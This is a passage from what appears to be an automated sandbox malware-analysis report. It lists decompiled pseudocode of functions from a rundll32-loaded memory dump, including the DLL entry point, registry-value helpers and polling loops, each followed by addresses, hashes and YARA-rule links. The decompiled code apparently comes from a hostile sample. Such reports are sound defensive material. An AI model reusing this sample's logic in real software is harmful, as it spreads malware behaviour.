				_t12 = E046B21CD(__ecx,  &_v12); // executed
				if(_t12 != 0) {
					_t14 =  *0x46bd27c; // 0x96a5a8
					_t4 = _t14 + 0x46be796; // 0x74666f53
					_t17 = E046B7A9A(_t4, 0);
					 *0x46bd33c = _t17;
					if(_t17 != 0) {
						_t18 =  *0x46bd27c; // 0x96a5a8
						_v8 = _v8 ^ 0x738bb12a;
						_t8 = _t18 + 0x46be862; // 0x61636f4c
						_t21 = E046B7A9A(_t8, 1);
						 *0x46bd344 = _t21;
						if(_t21 != 0) {
							_t23 = 1;
						}
					}
				}
				return _t23;
			}












                                                  0x046b96aa
                                                  0x046b96b0
                                                  0x046b96b3
                                                  0x046b96ba
                                                  0x046b96bc
                                                  0x046b96c3
                                                  0x046b96c5
                                                  0x046b96ca
                                                  0x046b96d5
                                                  0x046b96dc
                                                  0x046b96e1
                                                  0x046b96e3
                                                  0x046b96e8
                                                  0x046b96ef
                                                  0x046b96fb
                                                  0x046b9702
                                                  0x046b9707
                                                  0x046b9709
                                                  0x046b9709
                                                  0x046b9707
                                                  0x046b96e1
                                                  0x046b970e

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a817bebc5cc0a39903c65548143b499671f2eca93567059ab296523a9b09afd3
                                                  • Instruction ID: 71103d43bade42c7fa5454781c143a5cdfa51abe5fcddfab5fac2cd94faddee6
                                                  • Opcode Fuzzy Hash: a817bebc5cc0a39903c65548143b499671f2eca93567059ab296523a9b09afd3
                                                  • Instruction Fuzzy Hash: 59F014B6911119AADB20DFB8D9848CA77FCEB48704B1140B6DA41DB201F6B5EA88CBD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B2436, Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E046B2436(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t19;
				intOrPtr* _t22;

				_t22 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				_t19 = __imp__; // 0x75146490
				while(1) {
					_v16 = _t15;
					 *_t19(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t22 + 0xe0))(_t22,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}









                                                  0x046b2436
                                                  0x046b2443
                                                  0x046b2444
                                                  0x046b2445
                                                  0x046b244c
                                                  0x046b2452
                                                  0x046b247a
                                                  0x046b247b
                                                  0x046b247e
                                                  0x046b2484
                                                  0x00000000
                                                  0x00000000
                                                  0x046b2463
                                                  0x046b246d
                                                  0x046b2474
                                                  0x00000000
                                                  0x046b2465
                                                  0x046b2468
                                                  0x046b2488
                                                  0x046b246a
                                                  0x046b246a
                                                  0x00000000
                                                  0x046b246a
                                                  0x046b2468
                                                  0x046b248f
                                                  0x046b2495
                                                  0x046b2495
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec3afd720edb530acc322125bd587086b70dc3969b8fcb55f4d1f441a987d004
                                                  • Instruction ID: d146748dfd4b843ed20738df38cea40c99cfc1f1732e569dc6f2585ce5f4855e
                                                  • Opcode Fuzzy Hash: ec3afd720edb530acc322125bd587086b70dc3969b8fcb55f4d1f441a987d004
                                                  • Instruction Fuzzy Hash: 8DF03771D11219EFDB00DB98C498AEDB7B8EF04304F1080EAE642A7201E3B46B84DFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B24E1, Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E046B24E1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t14;
				void* _t16;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v12 = _a16;
				_t14 =  *0x46bd27c; // 0x96a5a8
				_t5 = _t14 + 0x46be10c; // 0x50286b4
				_t7 = _t14 + 0x46be2a4; // 0x650053
				_v20 = 3;
				_t16 = E046B9152(_t5, _a4, 0x80000001, _a8, _t7, _a12, _t5,  &_v20); // executed
				return _t16;
			}








                                                  0x046b24ed
                                                  0x046b24ee
                                                  0x046b24ef
                                                  0x046b24f0
                                                  0x046b24f5
                                                  0x046b24fc
                                                  0x046b2501
                                                  0x046b250b
                                                  0x046b2515
                                                  0x046b2523
                                                  0x046b252a

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25416dc5f83a97251f155c61123e6fbc1eefd2a8de289104079b2e92b1e3da94
                                                  • Instruction ID: 0737792363d34c1f43279e6a2d9460ff33fdca9a8e86b3c7e22c67023bfafb98
                                                  • Opcode Fuzzy Hash: 25416dc5f83a97251f155c61123e6fbc1eefd2a8de289104079b2e92b1e3da94
                                                  • Instruction Fuzzy Hash: C4F01C76410109BEDF01DFA8C844CDA77B9FB08304F008526FA05A6221E3B1EA559B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B8055, Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			_entry_(intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					__imp__(0x46bd23c);
					if(_t4 == 0) {
						E046B970F();
					}
				} else {
					_t7 = _t4 - 1;
					if(_t7 == 0) {
						__imp__(0x46bd23c);
						if(_t7 == 1) {
							_t8 = E046B6A56(_t7, _t9, _t10, _v0); // executed
							if(_t8 != 0) {
								_t12 = 0;
							}
						}
					}
				}
				return _t12;
			}










                                                  0x046b805c
                                                  0x046b805d
                                                  0x046b8060
                                                  0x046b808a
                                                  0x046b8092
                                                  0x046b8094
                                                  0x046b8094
                                                  0x046b8062
                                                  0x046b8062
                                                  0x046b8063
                                                  0x046b806a
                                                  0x046b8072
                                                  0x046b8078
                                                  0x046b807f
                                                  0x046b8081
                                                  0x046b8081
                                                  0x046b807f
                                                  0x046b8072
                                                  0x046b8063
                                                  0x046b809c

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 249d2314d9cd2da13690d5549f748cf0333be48d6cd8430f1225b355c8544388
                                                  • Instruction ID: 9eb0b3617cd1b598eb6adb74ea626786a2abed86ee7c5ca0cc4a6241b25b6930
                                                  • Opcode Fuzzy Hash: 249d2314d9cd2da13690d5549f748cf0333be48d6cd8430f1225b355c8544388
                                                  • Instruction Fuzzy Hash: 72E0DF78204A2157D7303F788808BDAB748AB20BC0F004028F7C4C7250F620E8C08BF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B904E, Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E046B904E(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				char _v8;
				void* _t13;

				_v8 = 1;
				if(_a4 == 0) {
					return E046B6B01(0x80000001, 4, _a8, _a12,  &_v8, 4);
				}
				_t13 = E046B24E1(_a4, _a8, _a12, 1); // executed
				return _t13;
			}





                                                  0x046b9059
                                                  0x046b905c
                                                  0x00000000
                                                  0x046b9082
                                                  0x046b9068
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 90b6b9d0705f26a6a4bbf97f0610232ae6848281c215c8379ed21e7059452824
                                                  • Instruction ID: 29663bf8dc3b4082e68fff0c3ee732ab58e074b0465cfafdb3bcfbabc29c3784
                                                  • Opcode Fuzzy Hash: 90b6b9d0705f26a6a4bbf97f0610232ae6848281c215c8379ed21e7059452824
                                                  • Instruction Fuzzy Hash: 57E01AB2100208FFEF15EF90CC01FEE3B69EB04348F108019BB5495060E672DAA4EB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046BA66E, Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 62%
                                                  			E046BA66E(void* __edx, void* __edi, char _a4) {
				void* _t7;
				void* _t12;

				_t7 = E046B7323(__edx, __edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					_push(_t12);
					_push(_a4);
					_push(__edi);
					L046B5544();
					 *((char*)(_t12 + __edi)) = 0;
					E046B9039(_t7, _a4);
				}
				return _t12;
			}





                                                  0x046ba67a
                                                  0x046ba67f
                                                  0x046ba683
                                                  0x046ba685
                                                  0x046ba686
                                                  0x046ba689
                                                  0x046ba68a
                                                  0x046ba695
                                                  0x046ba699
                                                  0x046ba699
                                                  0x046ba6a2

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                  • Instruction ID: f507e3709f04d95f70566d7ecd24c6ce0bf52563adf2bb0520b94eee043a7d2b
                                                  • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                  • Instruction Fuzzy Hash: 70E08673504228B6D7122A94DC00EEF7F5DCF55695F004029FE8849201F621E99093E5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046BAC81, Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E046BAC81() {

				E046BADE5(0x46bc344, 0x46bd15c); // executed
				goto __eax;
			}



                                                  0x046bac93
                                                  0x046bac9a

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92beba91b06f3702eb5ea20b00fa785bb8530f48e91d36015a33eec2e68aa76b
                                                  • Instruction ID: 2739e3fba1d8e56bef2f18911a8dbdf5836d8a25727275b3687d681410472db7
                                                  • Opcode Fuzzy Hash: 92beba91b06f3702eb5ea20b00fa785bb8530f48e91d36015a33eec2e68aa76b
                                                  • Instruction Fuzzy Hash: AFB012D5368101BF700415841D16CFA031CC1C091A320C52FF4C0D8104F4807CC603F5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046BAC9C, Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E046BAC9C() {

				E046BADE5(0x46bc344, 0x46bd158); // executed
				goto __eax;
			}



                                                  0x046bac93
                                                  0x046bac9a

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9952e7e0d8c43c349b3a3ccadfa740445efa51be6d4e8314ae223299ced6b016
                                                  • Instruction ID: badcdc0347692b81212a1855572a73cfc9ffb3e91f0a193cc58a8893135d16ff
                                                  • Opcode Fuzzy Hash: 9952e7e0d8c43c349b3a3ccadfa740445efa51be6d4e8314ae223299ced6b016
                                                  • Instruction Fuzzy Hash: CAB012D1368201AF708851881C06CFA021CC1C091A320811FB0C0C8204F4807CC603F5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B2049, Relevance: .0, Instructions: 5COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e84c4c6033bb5eb87e59a3be6a7038efd79f87c77ad4098bf5d8bcc42961462a
                                                  • Instruction ID: 97c48a0a7bcce44872ef556606f5ae463954795abc6f4664b3440f86abd66f7f
                                                  • Opcode Fuzzy Hash: e84c4c6033bb5eb87e59a3be6a7038efd79f87c77ad4098bf5d8bcc42961462a
                                                  • Instruction Fuzzy Hash: D5B01236404100AFDB114B00DD04F05BB21EB54710F005114B3044C070D3368CE0EB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions